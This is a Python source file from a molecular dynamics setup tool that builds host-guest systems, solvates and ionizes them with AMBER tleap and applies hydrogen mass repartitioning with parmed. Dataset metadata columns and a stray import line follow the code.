    # Substitute the user's MD parameters into every copied input template
    for dname, dirs, files in os.walk('./amber_files'):
      for fname in files:
        fpath = os.path.join(dname, fname)
        with open(fpath) as f:
          s = f.read()
          s = s.replace('_step_', dt).replace('_ntpr_', ntpr).replace('_ntwr_', ntwr).replace('_ntwe_', ntwe).replace('_ntwx_', ntwx).replace('_cutoff_', cut).replace('_gamma_ln_', gamma_ln).replace('_barostat_', barostat).replace('_amber_ff_', amber_ff)
        with open(fpath, "w") as f:
          f.write(s)
    if not os.path.exists('./run_files'):
      try:
        shutil.copytree('../../../run_files', './run_files')
      # Directories are the same
      except shutil.Error as e:
        print('Directory not copied. Error: %s' % e)
      # Any error saying that the directory doesn't exist
      except OSError as e:
        print('Directory not copied. Error: %s' % e)
    # Point the run scripts at the regular or mass-repartitioned topology
    if hmr == 'no':
      replacement = 'full.prmtop'
      for dname, dirs, files in os.walk('./run_files'):
        for fname in files:
          fpath = os.path.join(dname, fname)
          with open(fpath) as f:
            s = f.read()
            s = s.replace('full.hmr.prmtop', replacement)
          with open(fpath, "w") as f:
            f.write(s)
    elif hmr == 'yes':
      replacement = 'full.hmr.prmtop'
      for dname, dirs, files in os.walk('./run_files'):
        for fname in files:
          fpath = os.path.join(dname, fname)
          with open(fpath) as f:
            s = f.read()
            s = s.replace('full.prmtop', replacement)
          with open(fpath, "w") as f:
            f.write(s)
  if not os.path.exists('./%s%02d' %(comp, int(win))):
    os.makedirs('./%s%02d' %(comp, int(win)))
  os.chdir('./%s%02d' %(comp, int(win)))
  if int(win) == 0:
    for file in glob.glob('../../build_files/vac*'):
      shutil.copy(file, './')
    shutil.copy('../../build_files/'+host+'.pdb', './')
    shutil.copy('../../build_files/'+guest+'.pdb', './')
    shutil.copy('../../build_files/'+host+'-'+guest+'.pdb', './')
    shutil.copy('../../build_files/'+host+'-'+guest+'-aligned.pdb', './build-ini.pdb')
    # NOTE(review): filename uses 'guest' while the file was saved above as
    # guest.lower() -- only correct if guest is already lowercase; confirm.
    shutil.copy('../../build_files/anchors-'+guest+'.txt', './')
    shutil.copy('../../build_files/dum.frcmod', './')
    shutil.copy('../../build_files/dum.mol2', './')
    for file in glob.glob('../../ff/*.frcmod'):
      shutil.copy(file, './')
    for file in glob.glob('../../ff/*.mol2'):
      shutil.copy(file, './')
    # Accumulators for the assembled system (dummy atoms + receptor + guest)
    dum_coords = []
    recep_coords = []
    lig_coords = []
    dum_atomlist = []
    lig_atomlist = []
    recep_atomlist = []
    dum_atom = 0
    lig_atom = 0
    recep_atom = 0
    total_atom = 0
    resid_lig = 0
    resname_lig = mol
    resname_list = []
    resid_list = []
    # Read coordinates for dummy atoms
    for i in range(1, 3):
      shutil.copy('../../build_files/dum'+str(i)+'.pdb', './')
      with open('dum'+str(i)+'.pdb') as dum_in:
        lines = (line.rstrip() for line in dum_in)
        lines = list(line for line in lines if line)
        # Fixed PDB columns: name [12:16], resname [17:20], resid [22:26], xyz [30:54]
        dum_coords.append((float(lines[1][30:38].strip()), float(lines[1][38:46].strip()), float(lines[1][46:54].strip())))
        dum_atomlist.append(lines[1][12:16].strip())
        resname_list.append(lines[1][17:20].strip())
        resid_list.append(float(lines[1][22:26].strip()))
        dum_atom += 1
        total_atom += 1
    # Read coordinates from aligned system
    with open('build-ini.pdb') as f_in:
      lines = (line.rstrip() for line in f_in)
      lines = list(line for line in lines if line) # Non-blank lines in a list
    # Count atoms of receptor and ligand
    for i in range(0, len(lines)):
      if (lines[i][0:6].strip() == 'ATOM') or (lines[i][0:6].strip() == 'HETATM'):
        # Anything that is neither the guest residue nor a dummy is receptor
        if (lines[i][17:20].strip() != mol) and (lines[i][17:20].strip() != 'DUM'):
          recep_coords.append((float(lines[i][30:38].strip()), float(lines[i][38:46].strip()), float(lines[i][46:54].strip())))
          recep_atomlist.append(lines[i][12:16].strip())
          resname_list.append(lines[i][17:20].strip())
          resid_list.append(float(lines[i][22:26].strip()) + dum_atom)
          recep_last = int(lines[i][22:26].strip())
          recep_atom += 1
          total_atom += 1
        elif lines[i][17:20].strip() == mol:
          lig_coords.append((float(lines[i][30:38].strip()), float(lines[i][38:46].strip()), float(lines[i][46:54].strip())))
          lig_atomlist.append(lines[i][12:16].strip())
          resname_list.append(lines[i][17:20].strip())
          resid_list.append(float(lines[i][22:26].strip()) + dum_atom)
          lig_atom += 1
          total_atom += 1
    coords = dum_coords + recep_coords + lig_coords
    atom_namelist = dum_atomlist + recep_atomlist + lig_atomlist
    # NOTE(review): recep_last is only assigned if at least one receptor atom
    # was found; build-ini.pdb with no receptor atoms would raise NameError here.
    lig_resid = recep_last + dum_atom + 1
    # Write the new pdb file
    build_file = open('build.pdb', 'w')
    # Positions for the dummy atoms
    for i in range(0, 2):
      build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],resname_list[i], resid_list[i]))
      build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
      build_file.write('%6.2f%6.2f\n'%(0, 0))
      build_file.write('TER\n')
    # Positions of the receptor atoms
    for i in range(dum_atom , dum_atom + recep_atom):
      build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],resname_list[i], resid_list[i]))
      build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]), float(coords[i][2])))
      build_file.write('%6.2f%6.2f\n'%(0, 0))
    build_file.write('TER\n')
    # Positions of the ligand atoms
    for i in range(dum_atom + recep_atom, total_atom):
      build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, atom_namelist[i],mol, float(lig_resid)))
      build_file.write('%8.3f%8.3f%8.3f'%(float(coords[i][0]), float(coords[i][1]),float(coords[i][2])))
      build_file.write('%6.2f%6.2f\n'%(0, 0))
    build_file.write('TER\n')
    # Extra guests for decoupling
    # NOTE(review): the 'w' handle above is not explicitly closed before this
    # append handle is opened; CPython's refcount close/flush on rebinding
    # makes the write order come out right, but this is fragile -- confirm.
    build_file = open('build.pdb', 'a')
    if (comp == 'e'):
      # Decharging: one extra copy in place, two more shifted by sdr_dist in z
      for i in range(0, lig_atom):
        build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, lig_atomlist[i],mol, float(lig_resid+1)))
        build_file.write('%8.3f%8.3f%8.3f'%(float(lig_coords[i][0]), float(lig_coords[i][1]),float(lig_coords[i][2])))
        build_file.write('%6.2f%6.2f\n'%(0, 0))
      build_file.write('TER\n')
      for i in range(0, lig_atom):
        build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, lig_atomlist[i],mol, float(lig_resid+2)))
        build_file.write('%8.3f%8.3f%8.3f'%(float(lig_coords[i][0]), float(lig_coords[i][1]),float(lig_coords[i][2]+sdr_dist)))
        build_file.write('%6.2f%6.2f\n'%(0, 0))
      build_file.write('TER\n')
      for i in range(0, lig_atom):
        build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, lig_atomlist[i],mol, float(lig_resid+3)))
        build_file.write('%8.3f%8.3f%8.3f'%(float(lig_coords[i][0]), float(lig_coords[i][1]),float(lig_coords[i][2]+sdr_dist)))
        build_file.write('%6.2f%6.2f\n'%(0, 0))
      print('Creating new system for decharging...')
    else:
      # vdW decoupling: a single extra copy shifted by sdr_dist in z
      for i in range(0, lig_atom):
        build_file.write('%-4s %5s %-4s %3s %4.0f '%('ATOM', i+1, lig_atomlist[i],mol, float(lig_resid + 1)))
        build_file.write('%8.3f%8.3f%8.3f'%(float(lig_coords[i][0]), float(lig_coords[i][1]),float(lig_coords[i][2]+sdr_dist)))
        build_file.write('%6.2f%6.2f\n'%(0, 0))
      print('Creating new system for vdw decoupling...')
    build_file.write('TER\n')
    build_file.write('END\n')
    build_file.close()
  else:
    for file in glob.glob('../'+comp+'00/*'):
      shutil.copy(file, './')
  return 'all'
def _shift_host_bond_indices(bond_lines, final_host_num, shift):
  """Renumber 'model.N' residue references in tleap bond commands by +shift.

  Each input line looks like '<command> model.N.<atom> model.M.<atom>'; only
  residue numbers in 1..final_host_num are shifted (they move when dummy atoms
  and/or extra guest copies are prepended to the system).  Only the first
  three whitespace-separated fields are kept, matching the original behavior.
  """
  shifted = []
  for raw in bond_lines:
    data = raw.split()
    for j in range(1, len(data)):
      num_r = int(data[j].split('.')[1])
      if 1 <= num_r <= final_host_num:
        data[j] = data[j].replace('model.'+str(num_r), 'model.'+str(num_r+shift))
    shifted.append('%s %s %s' %(data[0], data[1], data[2]))
  return shifted
def create_box(comp, hmr, guest, host, mol, hmol, num_waters, water_model, ion_def, neut, buffer_x, buffer_y, buffer_z, stage, ntpr, ntwr, ntwe, ntwx, cut, gamma_ln, barostat, amber_ff, dt, final_host_num):
  """Solvate and ionize the current system with tleap, then apply HMR.

  Builds vacuum topologies for the complex, the guest and (equil stage) the
  host, determines the neutralizing ion counts from the tleap logs, sizes the
  water box either to a fixed number of waters (iterating on the z buffer) or
  to a fixed z buffer, writes and runs tleap_solvate.in, and finally runs
  parmed for hydrogen mass repartitioning.

  Exits via sys.exit(1) on unrecoverable setup errors (unknown water model,
  no box-sizing method given, box too small, tleap failures).
  """
  # Copy and replace simulation files
  if stage == 'equil':
    if os.path.exists('amber_files'):
      shutil.rmtree('./amber_files')
    try:
      shutil.copytree('../amber_files', './amber_files')
    # Directories are the same
    except shutil.Error as e:
      print('Directory not copied. Error: %s' % e)
    # Any error saying that the directory doesn't exist
    except OSError as e:
      print('Directory not copied. Error: %s' % e)
    # Substitute the user's MD parameters into every copied input template
    for dname, dirs, files in os.walk('./amber_files'):
      for fname in files:
        fpath = os.path.join(dname, fname)
        with open(fpath) as f:
          s = f.read()
          s = s.replace('_step_', dt).replace('_ntpr_', ntpr).replace('_ntwr_', ntwr).replace('_ntwe_', ntwe).replace('_ntwx_', ntwx).replace('_cutoff_', cut).replace('_gamma_ln_', gamma_ln).replace('_barostat_', barostat).replace('_amber_ff_', amber_ff)
        with open(fpath, "w") as f:
          f.write(s)
  os.chdir(guest)
  # Copy any additional parameters and bonds
  if stage == 'equil':
    for file in glob.glob('../../parameters/*.dat'):
      shutil.copy(file, './')
    if os.path.exists('../../parameters/host_bonds'):
      shutil.copy('../../parameters/host_bonds', './')
  else:
    for file in glob.glob('../../../../parameters/*.dat'):
      shutil.copy(file, './')
    if os.path.exists('../../../../parameters/host_bonds'):
      shutil.copy('../../../../parameters/host_bonds', './')
  # Configure bonds: host_bonds holds the raw commands, host_bonds1/2 the
  # versions with residue numbers shifted for the extra leading residues
  # (+1 for r/q components, +2 for e/v components).
  host_bonds = []
  host_bonds1 = []
  host_bonds2 = []
  if os.path.exists('./host_bonds'):
    with open('./host_bonds') as fin:
      host_bonds = [line.rstrip() for line in fin if line.rstrip()] # Non-blank lines
    host_bonds1 = _shift_host_bond_indices(host_bonds, final_host_num, 1)
    if (comp == 'e' or comp == 'v'):
      host_bonds2 = _shift_host_bond_indices(host_bonds, final_host_num, 2)
  # Copy tleap files that are used for restraint generation and analysis
  shutil.copy('../amber_files/tleap.in.amber16', 'tleap_vac.in')
  shutil.copy('../amber_files/tleap.in.amber16', 'tleap_vac_guest.in')
  shutil.copy('../amber_files/tleap.in.amber16', 'tleap_vac_host.in')
  shutil.copy('../amber_files/tleap.in.amber16', 'tleap.in')
  # Copy host and guest parameter files
  for file in glob.glob('../ff/*'):
    shutil.copy(file, './')
  # Append tleap file for vacuum
  tleap_vac = open('tleap_vac.in', 'a')
  tleap_vac.write('# Load the guest parameters\n')
  tleap_vac.write('loadamberparams %s.frcmod\n'%(guest.lower()))
  tleap_vac.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
  tleap_vac.write('# Load the host parameters\n')
  tleap_vac.write('loadamberparams %s.frcmod\n'%(host.lower()))
  tleap_vac.write('%s = loadmol2 %s.mol2\n\n'%(hmol.upper(), host.lower()))
  tleap_vac.write('model = loadpdb build.pdb\n\n')
  # Add bonds
  if (comp == 'r' or comp == 'q'):
    if len(host_bonds1) > 0:
      for i in host_bonds1:
        tleap_vac.write('%s\n' % i)
  elif (comp == 'v' or comp == 'e'):
    if len(host_bonds2) > 0:
      for i in host_bonds2:
        tleap_vac.write('%s\n' % i)
  tleap_vac.write('\n')
  tleap_vac.write('check model\n')
  tleap_vac.write('savepdb model vac.pdb\n')
  tleap_vac.write('saveamberparm model vac.prmtop vac.inpcrd\n')
  tleap_vac.write('quit\n')
  tleap_vac.close()
  # Generate complex in vacuum
  p = sp.call('tleap -s -f tleap_vac.in > tleap_vac.log', shell=True)
  # Append tleap file for guest only
  tleap_vac_ligand = open('tleap_vac_guest.in', 'a')
  tleap_vac_ligand.write('# Load the guest parameters\n')
  tleap_vac_ligand.write('loadamberparams %s.frcmod\n'%(guest.lower()))
  tleap_vac_ligand.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
  tleap_vac_ligand.write('model = loadpdb %s.pdb\n\n' %(guest.lower()))
  tleap_vac_ligand.write('check model\n')
  tleap_vac_ligand.write('savepdb model vac_guest.pdb\n')
  tleap_vac_ligand.write('saveamberparm model vac_guest.prmtop vac_guest.inpcrd\n')
  tleap_vac_ligand.write('quit\n')
  tleap_vac_ligand.close()
  # Generate guest structure in vacuum
  p = sp.call('tleap -s -f tleap_vac_guest.in > tleap_vac_guest.log', shell=True)
  if stage == 'equil':
    # Append tleap file for host only
    tleap_vac_ligand = open('tleap_vac_host.in', 'a')
    tleap_vac_ligand.write('# Load the host parameters\n')
    tleap_vac_ligand.write('loadamberparams %s.frcmod\n'%(host.lower()))
    tleap_vac_ligand.write('%s = loadmol2 %s.mol2\n\n'%(hmol.upper(), host.lower()))
    tleap_vac_ligand.write('model = loadpdb %s.pdb\n\n' %(host.lower()))
    # Add bonds (unshifted -- the host is loaded alone here)
    if len(host_bonds) > 0:
      for i in host_bonds:
        tleap_vac_ligand.write('%s\n' % i)
    tleap_vac_ligand.write('\n')
    tleap_vac_ligand.write('check model\n')
    tleap_vac_ligand.write('savepdb model vac_host.pdb\n')
    tleap_vac_ligand.write('saveamberparm model vac_host.prmtop vac_host.inpcrd\n')
    tleap_vac_ligand.write('quit\n')
    tleap_vac_ligand.close()
    # Generate host structure in vacuum
    p = sp.call('tleap -s -f tleap_vac_host.in > tleap_vac_host.log', shell=True)
  # Find out how many cations/anions are needed for neutralization
  # (tleap reports the total charge; the last matching line wins)
  neu_cat = 0
  neu_ani = 0
  with open('tleap_vac.log', 'r') as f:
    for line in f:
      if "The unperturbed charge of the unit" in line:
        splitline = line.split()
        if float(splitline[6].strip('\'\",.:;#()][')) < 0:
          neu_cat = round(float(re.sub('[+-]', '', splitline[6].strip('\'\"-,.:;#()]['))))
        elif float(splitline[6].strip('\'\",.:;#()][')) > 0:
          neu_ani = round(float(re.sub('[+-]', '', splitline[6].strip('\'\"-,.:;#()]['))))
  # Get ligand removed charge when doing LJ calculations
  lig_cat = 0
  lig_ani = 0
  with open('tleap_vac_guest.log', 'r') as f:
    for line in f:
      if "The unperturbed charge of the unit" in line:
        splitline = line.split()
        if float(splitline[6].strip('\'\",.:;#()][')) < 0:
          lig_cat = round(float(re.sub('[+-]', '', splitline[6].strip('\'\"-,.:;#()]['))))
        elif float(splitline[6].strip('\'\",.:;#()][')) > 0:
          lig_ani = round(float(re.sub('[+-]', '', splitline[6].strip('\'\"-,.:;#()]['))))
  # Adjust ions for LJ and electrostatic Calculations (avoid neutralizing plasma)
  if comp == 'v':
    charge_neut = neu_cat - neu_ani - 2*lig_cat + 2*lig_ani
    neu_cat = 0
    neu_ani = 0
    if charge_neut > 0:
      neu_cat = abs(charge_neut)
    if charge_neut < 0:
      neu_ani = abs(charge_neut)
  if comp == 'e':
    charge_neut = neu_cat - neu_ani - 3*lig_cat + 3*lig_ani
    neu_cat = 0
    neu_ani = 0
    if charge_neut > 0:
      neu_cat = abs(charge_neut)
    if charge_neut < 0:
      neu_ani = abs(charge_neut)
  # Define volume density for different water models
  # (ratio = waters per cubic angstrom, used to convert a water-count
  # difference into a z-buffer adjustment)
  if water_model == 'TIP3P':
    water_box = water_model.upper()+'BOX'
    ratio = 0.0576
  elif water_model == 'SPCE':
    water_box = 'SPCBOX'
    ratio = 0.0576
  elif water_model == 'TIP4PEW':
    water_box = water_model.upper()+'BOX'
    ratio = 0.0573
  else:
    # Fail fast: previously an unknown model caused a NameError on water_box below
    print('Water model %s is not supported (use TIP3P, SPCE or TIP4PEW)' % water_model)
    sys.exit(1)
  # No waters are removed manually unless the fixed-water iteration requests it.
  # Hoisted here: previously tleap_remove was undefined when the iteration
  # converged immediately (or when neither sizing branch ran), causing a NameError.
  tleap_remove = None
  # Fixed number of water molecules
  if num_waters != 0:
    # Create the first box guess to get the initial number of waters and cross sectional area
    buff = 50.0
    scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y)
    num_added = scripts.check_tleap()
    cross_area = scripts.cross_sectional_area()
    # First iteration to estimate box volume and number of ions
    res_diff = num_added - num_waters
    buff_diff = res_diff/(ratio*cross_area)
    buff -= buff_diff
    print(buff)
    if buff < 0:
      print ('Not enough water molecules to fill the system in the z direction, please increase the number of water molecules')
      sys.exit(1)
    # Get box volume and number of added ions
    scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y)
    box_volume = scripts.box_volume()
    print(box_volume)
    num_cations = round(0.85*ion_def[2]*6.02e23*box_volume*1e-27) # 0.85 factor to account for some shrinking of the box during equilibration
    print(num_cations)
    # Number of cations and anions
    num_cat = num_cations
    num_ani = num_cations - neu_cat + neu_ani
    # If there are not enough chosen cations to neutralize the system
    if num_ani < 0:
      num_cat = neu_cat
      num_cations = neu_cat
      num_ani = 0
    # Update target number of residues according to the ion definitions
    if (neut == 'no'):
      target_num = int(num_waters - neu_cat + neu_ani + 2*int(num_cations))
    elif (neut == 'yes'):
      target_num = int(num_waters + neu_cat + neu_ani)
    # Define a few parameters for solvation iteration
    buff = 50.0
    count = 0
    max_count = 10
    rem_limit = 16
    factor = 1
    ind = 0.90
    buff_diff = 1.0
    # Iterate to get the correct number of waters
    while num_added != target_num:
      count += 1
      if count > max_count:
        # Try different parameters
        rem_limit += 4
        if ind > 0.5:
          ind = ind - 0.02
        else:
          ind = 0.90
        factor = 1
        max_count = max_count + 10
      tleap_remove = None
      # Manually remove waters if inside removal limit
      if num_added > target_num and (num_added - target_num) < rem_limit:
        difference = num_added - target_num
        tleap_remove = [target_num + 1 + i for i in range(difference)]
        scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y, tleap_remove)
        scripts.check_tleap()
        break
      # Set new buffer size based on chosen water density
      res_diff = num_added - target_num - (rem_limit/2)
      buff_diff = res_diff/(ratio*cross_area)
      buff -= (buff_diff * factor)
      if buff < 0:
        print ('Not enough water molecules to fill the system in the z direction, please increase the number of water molecules or reduce the x and y buffers')
        sys.exit(1)
      # Set relaxation factor
      factor = ind * factor
      # Get number of waters
      scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y)
      num_added = scripts.check_tleap()
  # Fixed z buffer
  elif buffer_z != 0:
    buff = buffer_z
    tleap_remove = None
    # Get box volume and number of added ions
    scripts.write_tleap(mol, hmol, guest, host, water_model, water_box, buff, buffer_x, buffer_y)
    box_volume = scripts.box_volume()
    print(box_volume)
    num_cations = round(0.85*ion_def[2]*6.02e23*box_volume*1e-27) # 0.85 factor to account for some shrinking of the box during equilibration
    # Number of cations and anions
    num_cat = num_cations
    num_ani = num_cations - neu_cat + neu_ani
    # If there are not enough chosen cations to neutralize the system
    if num_ani < 0:
      num_cat = neu_cat
      num_cations = neu_cat
      num_ani = 0
    print(num_cations)
  else:
    # Fail fast: previously this fell through and crashed with a NameError on buff
    print('Please specify either a number of water molecules or a z buffer value')
    sys.exit(1)
  # Write the final tleap file with the correct system size and removed water molecules
  shutil.copy('tleap.in', 'tleap_solvate.in')
  tleap_solvate = open('tleap_solvate.in', 'a')
  tleap_solvate.write('# Load the guest parameters\n')
  tleap_solvate.write('loadamberparams %s.frcmod\n'%(guest.lower()))
  tleap_solvate.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
  tleap_solvate.write('# Load the host parameters\n')
  tleap_solvate.write('loadamberparams %s.frcmod\n'%(host.lower()))
  tleap_solvate.write('%s = loadmol2 %s.mol2\n\n'%(hmol.upper(), host.lower()))
  tleap_solvate.write('model = loadpdb build.pdb\n\n')
  # Add bonds
  if (comp == 'r' or comp == 'q'):
    if len(host_bonds1) > 0:
      for i in host_bonds1:
        tleap_solvate.write('%s\n' % i)
  elif (comp == 'v' or comp == 'e'):
    if len(host_bonds2) > 0:
      for i in host_bonds2:
        tleap_solvate.write('%s\n' % i)
  tleap_solvate.write('\n')
  tleap_solvate.write('# Load the water and jc ion parameters\n')
  tleap_solvate.write('source leaprc.water.%s\n'%(water_model.lower()))
  tleap_solvate.write('loadamberparams frcmod.ionsjc_%s\n\n'%(water_model.lower()))
  tleap_solvate.write('# Create water box with chosen model\n')
  tleap_solvate.write('solvatebox model ' + water_box + ' {'+ str(buffer_x) +' '+ str(buffer_y) +' '+ str(buff) +'}\n\n')
  if tleap_remove is not None:
    tleap_solvate.write('# Remove a few waters manually\n')
    for water in tleap_remove:
      tleap_solvate.write('remove model model.%s\n' % water)
    tleap_solvate.write('\n')
  # Ionize/neutralize system
  if (neut == 'no'):
    tleap_solvate.write('# Add ions for neutralization/ionization\n')
    tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[0], num_cat))
    tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[1], num_ani))
  elif (neut == 'yes'):
    tleap_solvate.write('# Add ions for neutralization/ionization\n')
    if neu_cat != 0:
      tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[0], neu_cat))
    if neu_ani != 0:
      tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[1], neu_ani))
  tleap_solvate.write('\n')
  tleap_solvate.write('desc model\n')
  tleap_solvate.write('savepdb model full.pdb\n')
  tleap_solvate.write('saveamberparm model full.prmtop full.inpcrd\n')
  tleap_solvate.write('quit')
  tleap_solvate.close()
  p = sp.call('tleap -s -f tleap_solvate.in > tleap_solvate.log', shell=True)
  # Scan the tleap log for fatal problems
  with open('tleap_solvate.log', 'r') as f:
    for line in f:
      if "Could not open file" in line:
        print ('WARNING!!!')
        print (line)
        sys.exit(1)
      if "WARNING: The unperturbed charge of the unit:" in line:
        print (line)
        print ('The system is not neutralized properly after solvation')
      if "addIonsRand: Argument #2 is type String must be of type: [unit]" in line:
        print('Aborted.The ion types specified in the input file could be wrong.')
        print('Please check the tleap_solvate.log file, and the ion types specified in the input file.\n')
        sys.exit(1)
  # Apply hydrogen mass repartitioning
  print('Applying mass repartitioning...')
  shutil.copy('../amber_files/parmed-hmr.in', './')
  sp.call('parmed -O -n -i parmed-hmr.in > parmed-hmr.log', shell=True)
  if stage != 'fe':
    os.chdir('../')
def guest_box(guest, mol, lig_buffer, water_model, neut, ion_def, comp, amber_ff):
    """Solvate a free guest (ligand) molecule and build Amber topologies.

    Workflow:
      1. Copy the ligand parameter files from ../../ff/.
      2. Write a preliminary tleap input (tmp_tleap.in) whose solvated box
         volume is measured by scripts.box_volume().
      3. From that volume, estimate the number of cations needed for the
         requested salt concentration.
      4. Write and run the final tleap input (tleap_solvate.in), producing
         vac.* and full.* topology/coordinate files.
      5. Apply hydrogen mass repartitioning with parmed.

    :param guest: ligand basename; lower-cased to locate .frcmod/.mol2/.pdb files.
    :param mol: ligand unit name used inside tleap (upper-cased).
    :param lig_buffer: solvatebox buffer distance, in Angstroms.
    :param water_model: 'TIP3P', 'SPCE' or 'TIP4PEW'.
    :param neut: 'yes' -> neutralize only; 'no' -> also add salt at ion_def[2] M.
    :param ion_def: sequence [cation_name, anion_name, molar_concentration].
    :param comp: component tag -- not used in this function; kept for a
        uniform signature with the sibling box-building helpers.
    :param amber_ff: leaprc force-field name sourced by tleap.
    :raises ValueError: if water_model is not one of the supported models.
    """
    # Map the chosen water model to tleap's water-box unit name.
    if water_model == 'TIP3P':
        water_box = water_model.upper()+'BOX'
    elif water_model == 'SPCE':
        water_box = 'SPCBOX'
    elif water_model == 'TIP4PEW':
        water_box = water_model.upper()+'BOX'
    else:
        # Fail fast: the original fell through and crashed later with an
        # unrelated NameError on water_box.
        raise ValueError('Unsupported water model: %s' % water_model)
    # Copy ligand parameter files ('param_file' avoids shadowing builtin 'file').
    for param_file in glob.glob('../../ff/%s.*' % guest.lower()):
        shutil.copy(param_file, './')
    # Write preliminary tleap file used only to measure the solvated volume.
    with open('tmp_tleap.in', 'w') as tleap_solvate:
        tleap_solvate.write('source leaprc.'+amber_ff+'\n\n')
        tleap_solvate.write('# Load the ligand parameters\n')
        tleap_solvate.write('loadamberparams %s.frcmod\n'%(guest.lower()))
        tleap_solvate.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
        tleap_solvate.write('model = loadpdb %s.pdb\n\n' %(guest.lower()))
        tleap_solvate.write('# Load the water and jc ion parameters\n')
        tleap_solvate.write('source leaprc.water.%s\n'%(water_model.lower()))
        tleap_solvate.write('loadamberparams frcmod.ionsjc_%s\n\n'%(water_model.lower()))
        tleap_solvate.write('check model\n')
        tleap_solvate.write('savepdb model vac.pdb\n')
        tleap_solvate.write('saveamberparm model vac.prmtop vac.inpcrd\n\n')
        tleap_solvate.write('# Create water box with chosen model\n')
        tleap_solvate.write('solvatebox model ' + water_box + ' '+str(lig_buffer)+'\n\n')
        tleap_solvate.write('quit\n')
    # Get box volume and number of added ions
    # (scripts.box_volume() presumably runs/parses tmp_tleap.in -- TODO confirm).
    box_volume = scripts.box_volume()
    print(box_volume)
    # 0.85 factor accounts for some shrinking of the box during equilibration;
    # 6.02e23 and 1e-27 convert mol/L and Angstrom^3 into a particle count.
    num_cations = round(0.85*ion_def[2]*6.02e23*box_volume*1e-27)
    print(num_cations)
    # Write and run the final tleap file. BUG FIX: the original opened this
    # file in append mode ('a'), so stale content from a previous run would
    # be re-executed by tleap; 'w' guarantees a fresh input deck.
    with open('tleap_solvate.in', 'w') as tleap_solvate:
        tleap_solvate.write('source leaprc.'+amber_ff+'\n\n')
        tleap_solvate.write('# Load the ligand parameters\n')
        tleap_solvate.write('loadamberparams %s.frcmod\n'%(guest.lower()))
        tleap_solvate.write('%s = loadmol2 %s.mol2\n\n'%(mol.upper(), guest.lower()))
        tleap_solvate.write('model = loadpdb %s.pdb\n\n' %(guest.lower()))
        tleap_solvate.write('# Load the water and jc ion parameters\n')
        tleap_solvate.write('source leaprc.water.%s\n'%(water_model.lower()))
        tleap_solvate.write('loadamberparams frcmod.ionsjc_%s\n\n'%(water_model.lower()))
        tleap_solvate.write('check model\n')
        tleap_solvate.write('savepdb model vac.pdb\n')
        tleap_solvate.write('saveamberparm model vac.prmtop vac.inpcrd\n\n')
        tleap_solvate.write('# Create water box with chosen model\n')
        tleap_solvate.write('solvatebox model ' + water_box + ' '+str(lig_buffer)+'\n\n')
        if (neut == 'no'):
            # Add salt: estimated cations plus anions to balance (tleap's
            # addionsrand with count 0 adds enough ions to neutralize).
            tleap_solvate.write('# Add ions for neutralization/ionization\n')
            tleap_solvate.write('addionsrand model %s %d\n' % (ion_def[0], num_cations))
            tleap_solvate.write('addionsrand model %s 0\n' % (ion_def[1]))
        elif (neut == 'yes'):
            # Neutralize only: let tleap pick the counts for both species.
            tleap_solvate.write('# Add ions for neutralization/ionization\n')
            tleap_solvate.write('addionsrand model %s 0\n' % (ion_def[0]))
            tleap_solvate.write('addionsrand model %s 0\n' % (ion_def[1]))
        tleap_solvate.write('\n')
        tleap_solvate.write('desc model\n')
        tleap_solvate.write('savepdb model full.pdb\n')
        tleap_solvate.write('saveamberparm model full.prmtop full.inpcrd\n')
        tleap_solvate.write('quit\n')
    p = sp.call('tleap -s -f tleap_solvate.in > tleap_solvate.log', shell=True)
    # Apply hydrogen mass repartitioning
    print('Applying mass repartitioning...')
    shutil.copy('../amber_files/parmed-hmr.in', './')
    sp.call('parmed -O -n -i parmed-hmr.in > parmed-hmr.log', shell=True)
    # Copy a few files for consistency
    shutil.copy('./vac.pdb','./vac_guest.pdb')
    shutil.copy('./vac.prmtop','./vac_guest.prmtop')
| 44.099647
| 515
| 0.585695
| 7,180
| 50,009
| 3.955571
| 0.065181
| 0.034647
| 0.040104
| 0.019647
| 0.867716
| 0.84916
| 0.823598
| 0.809056
| 0.791416
| 0.768811
| 0
| 0.024836
| 0.234318
| 50,009
| 1,133
| 516
| 44.13857
| 0.716879
| 0.090424
| 0
| 0.751412
| 0
| 0.012429
| 0.221194
| 0.036344
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00565
| false
| 0
| 0.010169
| 0
| 0.025989
| 0.054237
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b92493f07ad9cf44da54299f90a578af03a0afaf
| 216
|
py
|
Python
|
core/utils/customFields.py
|
likx2/HypeFans
|
9eb3ce6293d2aea218e13aedcf32796d0ab40507
|
[
"MIT"
] | null | null | null |
core/utils/customFields.py
|
likx2/HypeFans
|
9eb3ce6293d2aea218e13aedcf32796d0ab40507
|
[
"MIT"
] | null | null | null |
core/utils/customFields.py
|
likx2/HypeFans
|
9eb3ce6293d2aea218e13aedcf32796d0ab40507
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
